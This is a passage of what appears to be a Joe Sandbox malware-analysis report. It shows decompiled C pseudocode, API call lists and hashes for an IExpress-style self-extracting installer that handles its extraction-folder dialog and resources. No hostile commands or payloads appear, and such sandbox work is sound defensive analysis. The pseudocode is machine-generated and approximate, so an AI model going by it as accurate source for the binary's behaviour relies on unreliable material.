                                                                                                                                                                                                      					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                      					__eflags =  *0xa69a40 - _t42; // 0x3
                                                                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                                                                      						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L36:
                                                                                                                                                                                                      					return _t42;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t10 == _t42) {
                                                                                                                                                                                                      					_t20 = _a12 - 1;
                                                                                                                                                                                                      					__eflags = _t20;
                                                                                                                                                                                                      					if(_t20 == 0) {
                                                                                                                                                                                                      						_t21 = GetDlgItemTextA(_t64, 0x835, 0xa691e4, 0x104);
                                                                                                                                                                                                      						__eflags = _t21;
                                                                                                                                                                                                      						if(_t21 == 0) {
                                                                                                                                                                                                      							L32:
                                                                                                                                                                                                      							_t58 = 0x4bf;
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0x10);
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							L25:
                                                                                                                                                                                                      							E00A644B9(_t64, _t58);
                                                                                                                                                                                                      							goto L39;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t49 = 0xa691e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t23 =  *_t49;
                                                                                                                                                                                                      							_t49 =  &(_t49[1]);
                                                                                                                                                                                                      							__eflags = _t23;
                                                                                                                                                                                                      						} while (_t23 != 0);
                                                                                                                                                                                                      						__eflags = _t49 - 0xa691e5 - 3;
                                                                                                                                                                                                      						if(_t49 - 0xa691e5 < 3) {
                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t24 =  *0xa691e5; // 0x3a
                                                                                                                                                                                                      						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                      						if(_t24 == 0x3a) {
                                                                                                                                                                                                      							L21:
                                                                                                                                                                                                      							_t25 = GetFileAttributesA(0xa691e4);
                                                                                                                                                                                                      							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                      							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                      								L26:
                                                                                                                                                                                                      								E00A6658A(0xa691e4, 0x104, 0xa61140);
                                                                                                                                                                                                      								_t27 = E00A658C8(0xa691e4);
                                                                                                                                                                                                      								__eflags = _t27;
                                                                                                                                                                                                      								if(_t27 != 0) {
                                                                                                                                                                                                      									__eflags =  *0xa691e4 - 0x5c;
                                                                                                                                                                                                      									if( *0xa691e4 != 0x5c) {
                                                                                                                                                                                                      										L30:
                                                                                                                                                                                                      										_t30 = E00A6597D(0xa691e4, 1, _t64, 1);
                                                                                                                                                                                                      										__eflags = _t30;
                                                                                                                                                                                                      										if(_t30 == 0) {
                                                                                                                                                                                                      											L35:
                                                                                                                                                                                                      											_t42 = 1;
                                                                                                                                                                                                      											__eflags = 1;
                                                                                                                                                                                                      											goto L36;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										L31:
                                                                                                                                                                                                      										_t42 = 1;
                                                                                                                                                                                                      										EndDialog(_t64, 1);
                                                                                                                                                                                                      										goto L36;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									__eflags =  *0xa691e5 - 0x5c;
                                                                                                                                                                                                      									if( *0xa691e5 == 0x5c) {
                                                                                                                                                                                                      										goto L31;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L30;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0x10);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_t58 = 0x4be;
                                                                                                                                                                                                      								goto L25;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t32 = E00A644B9(_t64, 0x54a, 0xa691e4, 0, 0x20, 4);
                                                                                                                                                                                                      							__eflags = _t32 - 6;
                                                                                                                                                                                                      							if(_t32 != 6) {
                                                                                                                                                                                                      								goto L35;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t33 = CreateDirectoryA(0xa691e4, 0);
                                                                                                                                                                                                      							__eflags = _t33;
                                                                                                                                                                                                      							if(_t33 != 0) {
                                                                                                                                                                                                      								goto L26;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0x10);
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0xa691e4);
                                                                                                                                                                                                      							_t58 = 0x4cb;
                                                                                                                                                                                                      							goto L25;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags =  *0xa691e4 - 0x5c;
                                                                                                                                                                                                      						if( *0xa691e4 != 0x5c) {
                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                      						if(_t24 != 0x5c) {
                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L21;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t34 = _t20 - 1;
                                                                                                                                                                                                      					__eflags = _t34;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						EndDialog(_t64, 0);
                                                                                                                                                                                                      						 *0xa69124 = 0x800704c7;
                                                                                                                                                                                                      						goto L39;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__eflags = _t34 != 0x834;
                                                                                                                                                                                                      					if(_t34 != 0x834) {
                                                                                                                                                                                                      						goto L36;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t37 = LoadStringA( *0xa69a3c, 0x3e8, 0xa68598, 0x200);
                                                                                                                                                                                                      					__eflags = _t37;
                                                                                                                                                                                                      					if(_t37 != 0) {
                                                                                                                                                                                                      						_t38 = E00A64224(_t64, _t46, _t46);
                                                                                                                                                                                                      						__eflags = _t38;
                                                                                                                                                                                                      						if(_t38 == 0) {
                                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t39 = SetDlgItemTextA(_t64, 0x835, 0xa687a0);
                                                                                                                                                                                                      						__eflags = _t39;
                                                                                                                                                                                                      						if(_t39 != 0) {
                                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t63 = 0x4c0;
                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                      						E00A644B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						goto L38;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t63 = 0x4b1;
                                                                                                                                                                                                      					goto L9;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}

























                                                                                                                                                                                                      0x00a6321b
                                                                                                                                                                                                      0x00a6321e
                                                                                                                                                                                                      0x00a63221
                                                                                                                                                                                                      0x00a6343c
                                                                                                                                                                                                      0x00a6343e
                                                                                                                                                                                                      0x00a6343f
                                                                                                                                                                                                      0x00a63445
                                                                                                                                                                                                      0x00a63447
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63447
                                                                                                                                                                                                      0x00a63229
                                                                                                                                                                                                      0x00a6322a
                                                                                                                                                                                                      0x00a6322f
                                                                                                                                                                                                      0x00a633ec
                                                                                                                                                                                                      0x00a633f7
                                                                                                                                                                                                      0x00a63410
                                                                                                                                                                                                      0x00a63416
                                                                                                                                                                                                      0x00a6341d
                                                                                                                                                                                                      0x00a6342d
                                                                                                                                                                                                      0x00a6342d
                                                                                                                                                                                                      0x00a63438
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63438
                                                                                                                                                                                                      0x00a63237
                                                                                                                                                                                                      0x00a63243
                                                                                                                                                                                                      0x00a63243
                                                                                                                                                                                                      0x00a63246
                                                                                                                                                                                                      0x00a632ee
                                                                                                                                                                                                      0x00a632f4
                                                                                                                                                                                                      0x00a632f6
                                                                                                                                                                                                      0x00a633d4
                                                                                                                                                                                                      0x00a633d6
                                                                                                                                                                                                      0x00a633db
                                                                                                                                                                                                      0x00a633dc
                                                                                                                                                                                                      0x00a633de
                                                                                                                                                                                                      0x00a633df
                                                                                                                                                                                                      0x00a63370
                                                                                                                                                                                                      0x00a63372
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63372
                                                                                                                                                                                                      0x00a632fc
                                                                                                                                                                                                      0x00a63301
                                                                                                                                                                                                      0x00a63301
                                                                                                                                                                                                      0x00a63303
                                                                                                                                                                                                      0x00a63304
                                                                                                                                                                                                      0x00a63304
                                                                                                                                                                                                      0x00a6330a
                                                                                                                                                                                                      0x00a6330d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63313
                                                                                                                                                                                                      0x00a63318
                                                                                                                                                                                                      0x00a6331a
                                                                                                                                                                                                      0x00a63331
                                                                                                                                                                                                      0x00a63332
                                                                                                                                                                                                      0x00a6333a
                                                                                                                                                                                                      0x00a6333d
                                                                                                                                                                                                      0x00a6337c
                                                                                                                                                                                                      0x00a63388
                                                                                                                                                                                                      0x00a6338f
                                                                                                                                                                                                      0x00a63394
                                                                                                                                                                                                      0x00a63396
                                                                                                                                                                                                      0x00a633a4
                                                                                                                                                                                                      0x00a633ab
                                                                                                                                                                                                      0x00a633b6
                                                                                                                                                                                                      0x00a633be
                                                                                                                                                                                                      0x00a633c3
                                                                                                                                                                                                      0x00a633c5
                                                                                                                                                                                                      0x00a63435
                                                                                                                                                                                                      0x00a63437
                                                                                                                                                                                                      0x00a63437
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63437
                                                                                                                                                                                                      0x00a633c7
                                                                                                                                                                                                      0x00a633c9
                                                                                                                                                                                                      0x00a633cc
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a633cc
                                                                                                                                                                                                      0x00a633ad
                                                                                                                                                                                                      0x00a633b4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a633b4
                                                                                                                                                                                                      0x00a63398
                                                                                                                                                                                                      0x00a63399
                                                                                                                                                                                                      0x00a6339b
                                                                                                                                                                                                      0x00a6339c
                                                                                                                                                                                                      0x00a6339d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6339d
                                                                                                                                                                                                      0x00a6334c
                                                                                                                                                                                                      0x00a63351
                                                                                                                                                                                                      0x00a63354
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6335c
                                                                                                                                                                                                      0x00a63362
                                                                                                                                                                                                      0x00a63364
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63366
                                                                                                                                                                                                      0x00a63367
                                                                                                                                                                                                      0x00a63369
                                                                                                                                                                                                      0x00a6336a
                                                                                                                                                                                                      0x00a6336b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6336b
                                                                                                                                                                                                      0x00a6331c
                                                                                                                                                                                                      0x00a63323
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63329
                                                                                                                                                                                                      0x00a6332b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6332b
                                                                                                                                                                                                      0x00a6324c
                                                                                                                                                                                                      0x00a6324c
                                                                                                                                                                                                      0x00a6324f
                                                                                                                                                                                                      0x00a632c8
                                                                                                                                                                                                      0x00a632ce
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a632ce
                                                                                                                                                                                                      0x00a63251
                                                                                                                                                                                                      0x00a63256
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63271
                                                                                                                                                                                                      0x00a63277
                                                                                                                                                                                                      0x00a63279
                                                                                                                                                                                                      0x00a63298
                                                                                                                                                                                                      0x00a6329d
                                                                                                                                                                                                      0x00a6329f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a632b0
                                                                                                                                                                                                      0x00a632b6
                                                                                                                                                                                                      0x00a632b8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a632be
                                                                                                                                                                                                      0x00a63280
                                                                                                                                                                                                      0x00a63289
                                                                                                                                                                                                      0x00a6328e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6328e
                                                                                                                                                                                                      0x00a6327b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6327b
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadStringA.USER32(000003E8,00A68598,00000200), ref: 00A63271
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00A633E2
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 00A633F7
                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00A63410
                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000836), ref: 00A63426
                                                                                                                                                                                                      • EnableWindow.USER32(00000000), ref: 00A6342D
                                                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 00A6343F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$cent
                                                                                                                                                                                                      • API String ID: 2418873061-3876674994
                                                                                                                                                                                                      • Opcode ID: b05857d7997d81c85310a49366e9758a767f496cd6a5a73f3ddaf66cc9654ba8
                                                                                                                                                                                                      • Instruction ID: 42ca276c51b19e9d87b05ba31425fe8309afb712e7ce1f9d225d9b577aa1d280
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b05857d7997d81c85310a49366e9758a767f496cd6a5a73f3ddaf66cc9654ba8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB51383238024077FF219B755C8DFBB697CEB66B55F104228F206EA2D1CEF48A039661
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E00A62CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				struct HRSRC__* _t31;
                                                                                                                                                                                                      				intOrPtr _t33;
                                                                                                                                                                                                      				void* _t43;
                                                                                                                                                                                                      				void* _t48;
                                                                                                                                                                                                      				signed int _t65;
                                                                                                                                                                                                      				struct HINSTANCE__* _t66;
                                                                                                                                                                                                      				signed int _t67;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t13 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                      				_t65 = 0;
                                                                                                                                                                                                      				_t66 = __ecx;
                                                                                                                                                                                                      				_t48 = __edx;
                                                                                                                                                                                                      				 *0xa69a3c = __ecx;
                                                                                                                                                                                                      				memset(0xa69140, 0, 0x8fc);
                                                                                                                                                                                                      				memset(0xa68a20, 0, 0x32c);
                                                                                                                                                                                                      				memset(0xa688c0, 0, 0x104);
                                                                                                                                                                                                      				 *0xa693ec = 1;
                                                                                                                                                                                                      				_t20 = E00A6468F("TITLE", 0xa69154, 0x7f);
                                                                                                                                                                                                      				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                      					_t64 = 0x4b1;
                                                                                                                                                                                                      					goto L32;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                      					 *0xa6858c = _t27;
                                                                                                                                                                                                      					SetEvent(_t27);
                                                                                                                                                                                                      					_t64 = 0xa69a34;
                                                                                                                                                                                                      					if(E00A6468F("EXTRACTOPT", 0xa69a34, 4) != 0) {
                                                                                                                                                                                                      						if(( *0xa69a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                      							L12:
                                                                                                                                                                                                      							 *0xa69120 =  *0xa69120 & _t65;
                                                                                                                                                                                                      							if(E00A65C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                      								if( *0xa68a3a == 0) {
                                                                                                                                                                                                      									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                      									if(_t31 != 0) {
                                                                                                                                                                                                      										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									if( *0xa68184 != 0) {
                                                                                                                                                                                                      										__imp__#17();
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									if( *0xa68a24 == 0) {
                                                                                                                                                                                                      										_t57 = _t65;
                                                                                                                                                                                                      										if(E00A636EE(_t65) == 0) {
                                                                                                                                                                                                      											goto L33;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t33 =  *0xa69a40; // 0x3
                                                                                                                                                                                                      											_t48 = 1;
                                                                                                                                                                                                      											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                      												if(( *0xa69a34 & 0x00000100) == 0 || ( *0xa68a38 & 0x00000001) != 0 || E00A618A3(_t64, _t66) != 0) {
                                                                                                                                                                                                      													goto L30;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t64 = 0x7d6;
                                                                                                                                                                                                      													if(E00A66517(_t57, 0x7d6, _t34, E00A619E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                      														goto L33;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														goto L30;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												L30:
                                                                                                                                                                                                      												_t23 = _t48;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t23 = 1;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E00A62390(0xa68a3a);
                                                                                                                                                                                                      									goto L33;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t64 = 0x520;
                                                                                                                                                                                                      								L32:
                                                                                                                                                                                                      								E00A644B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                      								goto L33;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t64 =  &_v268;
                                                                                                                                                                                                      							if(E00A6468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                      								goto L3;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                      								 *0xa68588 = _t43;
                                                                                                                                                                                                      								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                      									goto L12;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									if(( *0xa69a34 & 0x00000080) == 0) {
                                                                                                                                                                                                      										_t64 = 0x524;
                                                                                                                                                                                                      										if(E00A644B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                      											goto L12;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L11;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t64 = 0x54b;
                                                                                                                                                                                                      										E00A644B9(0, 0x54b, "cent", 0, 0x10, 0);
                                                                                                                                                                                                      										L11:
                                                                                                                                                                                                      										CloseHandle( *0xa68588);
                                                                                                                                                                                                      										 *0xa69124 = 0x800700b7;
                                                                                                                                                                                                      										goto L33;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						L3:
                                                                                                                                                                                                      						_t64 = 0x4b1;
                                                                                                                                                                                                      						E00A644B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						 *0xa69124 = 0x80070714;
                                                                                                                                                                                                      						L33:
                                                                                                                                                                                                      						_t23 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A66CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      0x00a62cb5
                                                                                                                                                                                                      0x00a62cbc
                                                                                                                                                                                                      0x00a62cc7
                                                                                                                                                                                                      0x00a62cc9
                                                                                                                                                                                                      0x00a62cd1
                                                                                                                                                                                                      0x00a62cd3
                                                                                                                                                                                                      0x00a62cd9
                                                                                                                                                                                                      0x00a62ce9
                                                                                                                                                                                                      0x00a62cf9
                                                                                                                                                                                                      0x00a62d0e
                                                                                                                                                                                                      0x00a62d15
                                                                                                                                                                                                      0x00a62d1c
                                                                                                                                                                                                      0x00a62ef3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62d2d
                                                                                                                                                                                                      0x00a62d34
                                                                                                                                                                                                      0x00a62d3b
                                                                                                                                                                                                      0x00a62d40
                                                                                                                                                                                                      0x00a62d48
                                                                                                                                                                                                      0x00a62d59
                                                                                                                                                                                                      0x00a62d84
                                                                                                                                                                                                      0x00a62e1f
                                                                                                                                                                                                      0x00a62e1f
                                                                                                                                                                                                      0x00a62e2e
                                                                                                                                                                                                      0x00a62e41
                                                                                                                                                                                                      0x00a62e5a
                                                                                                                                                                                                      0x00a62e62
                                                                                                                                                                                                      0x00a62e6c
                                                                                                                                                                                                      0x00a62e6c
                                                                                                                                                                                                      0x00a62e75
                                                                                                                                                                                                      0x00a62e77
                                                                                                                                                                                                      0x00a62e77
                                                                                                                                                                                                      0x00a62e84
                                                                                                                                                                                                      0x00a62e8b
                                                                                                                                                                                                      0x00a62e94
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62e96
                                                                                                                                                                                                      0x00a62e96
                                                                                                                                                                                                      0x00a62e9e
                                                                                                                                                                                                      0x00a62ea2
                                                                                                                                                                                                      0x00a62eba
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62ece
                                                                                                                                                                                                      0x00a62ede
                                                                                                                                                                                                      0x00a62eed
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62eed
                                                                                                                                                                                                      0x00a62eef
                                                                                                                                                                                                      0x00a62eef
                                                                                                                                                                                                      0x00a62eef
                                                                                                                                                                                                      0x00a62eef
                                                                                                                                                                                                      0x00a62ea2
                                                                                                                                                                                                      0x00a62e86
                                                                                                                                                                                                      0x00a62e88
                                                                                                                                                                                                      0x00a62e88
                                                                                                                                                                                                      0x00a62e43
                                                                                                                                                                                                      0x00a62e48
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62e48
                                                                                                                                                                                                      0x00a62e30
                                                                                                                                                                                                      0x00a62e30
                                                                                                                                                                                                      0x00a62ef8
                                                                                                                                                                                                      0x00a62f01
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62f01
                                                                                                                                                                                                      0x00a62d8a
                                                                                                                                                                                                      0x00a62d8f
                                                                                                                                                                                                      0x00a62da1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62da3
                                                                                                                                                                                                      0x00a62dae
                                                                                                                                                                                                      0x00a62db4
                                                                                                                                                                                                      0x00a62dbb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62dca
                                                                                                                                                                                                      0x00a62dd3
                                                                                                                                                                                                      0x00a62df5
                                                                                                                                                                                                      0x00a62e02
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62dd5
                                                                                                                                                                                                      0x00a62dde
                                                                                                                                                                                                      0x00a62de3
                                                                                                                                                                                                      0x00a62e04
                                                                                                                                                                                                      0x00a62e0a
                                                                                                                                                                                                      0x00a62e10
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62e10
                                                                                                                                                                                                      0x00a62dd3
                                                                                                                                                                                                      0x00a62dbb
                                                                                                                                                                                                      0x00a62da1
                                                                                                                                                                                                      0x00a62d5b
                                                                                                                                                                                                      0x00a62d5b
                                                                                                                                                                                                      0x00a62d5d
                                                                                                                                                                                                      0x00a62d69
                                                                                                                                                                                                      0x00a62d6e
                                                                                                                                                                                                      0x00a62f06
                                                                                                                                                                                                      0x00a62f06
                                                                                                                                                                                                      0x00a62f06
                                                                                                                                                                                                      0x00a62d59
                                                                                                                                                                                                      0x00a62f18

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.MSVCRT ref: 00A62CD9
                                                                                                                                                                                                      • memset.MSVCRT ref: 00A62CE9
                                                                                                                                                                                                      • memset.MSVCRT ref: 00A62CF9
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646A0
                                                                                                                                                                                                        • Part of subcall function 00A6468F: SizeofResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646A9
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646C3
                                                                                                                                                                                                        • Part of subcall function 00A6468F: LoadResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646CC
                                                                                                                                                                                                        • Part of subcall function 00A6468F: LockResource.KERNEL32(00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646D3
                                                                                                                                                                                                        • Part of subcall function 00A6468F: memcpy_s.MSVCRT ref: 00A646E5
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646EF
                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A62D34
                                                                                                                                                                                                      • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00A62D40
                                                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A62DAE
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00A62DBD
                                                                                                                                                                                                      • CloseHandle.KERNEL32(cent,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A62E0A
                                                                                                                                                                                                        • Part of subcall function 00A644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A64518
                                                                                                                                                                                                        • Part of subcall function 00A644B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A64554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
